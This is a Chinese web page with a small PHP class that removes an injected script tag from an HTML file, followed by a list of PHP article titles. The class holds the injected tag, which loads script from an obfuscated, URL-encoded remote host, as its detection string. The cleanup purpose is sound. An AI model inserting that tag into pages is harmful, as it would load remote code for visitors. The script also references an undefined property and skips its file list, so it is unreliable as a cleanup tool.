php 清除网页病毒的方法

2015-01-24信息快讯网

好像是进行一些替换操作,大家可以测试

<?php
Class clear_virus{
public $index ='b.html';
public $filepath =array('b.html');
public $virus_type ="<script src=http://%61%76%65%33%2E%63%6E></script>";
function open_file(){
if(file_exists($this->index)){
$tmp =file_get_contents($this->index);
if( strrpos($tmp,$this->virus_type)!== false){
$temp =str_replace($this->virus_type,'',$tmp);
$handle =fopen($this->index,'w');
fwrite($handle,$temp);
fclose($handle);
}else{
echo $this->virus_find;
}
}
}
}
$virus =new clear_virus;
$virus->open_file();
?>
清除script 病毒
为IP查询添加GOOGLE地图功能的代码
ionCube 一款类似zend的PHP加密/解密工具
Google Voice 短信发送接口PHP开源版(2010.5更新)
在Windows系统上安装PHP运行环境文字教程
Windows下XDebug 手工配置与使用说明
PHP中文URL编解码(urlencode()rawurlencode()
php下mysql数据库操作类(改自discuz)
PHP 数组遍历方法大全(foreach,list,each)
IIS下PHP连接数据库提示mysql undefined function mysql_connect()
PHP stristr() 函数(不区分大小写的字符串查找)
Discuz!下Memcache缓存实现方法
Windows7下PHP开发环境安装配置图文方法
php 提速工具eAccelerator 配置参数详解
php select,radio和checkbox默认选择的实现方法
php中$this-&gt;含义分析
php self,$this,const,static,-&gt;的使用
PHP nl2br函数 将换行字符转成 &lt;br&gt;
php 远程关机操作的代码
php读取msn上的用户信息类
Zend Studio 无法启动的问题解决方法
Apache+php+mysql在windows下的安装与配置图解(最新版)
discuz论坛 用户登录 后台程序代码
PHPMailer安装方法及简单实例
IIS php环境配置PHP5 MySQL5 ZendOptimizer phpmyadmin安装与配置
Linux下 php5 MySQL5 Apache2 phpMyAdmin ZendOptimizer安装与配置[图文]
利用discuz实现PHP大文件上传应用实例代码
PHP syntax error, unexpected $end 错误的一种原因及解决
关于DISCUZ不用通行证登陆得内容介绍第1/2页
使用eAccelerator加密PHP程序
php仿discuz分页效果代码
FleaPHP的安全设置方法
用PHP调用Oracle存储过程的方法
PHPMailer邮件类利用smtp.163.com发送邮件方法
<b>一些常用的php函数</b>
©2014-2024 dbsqp.com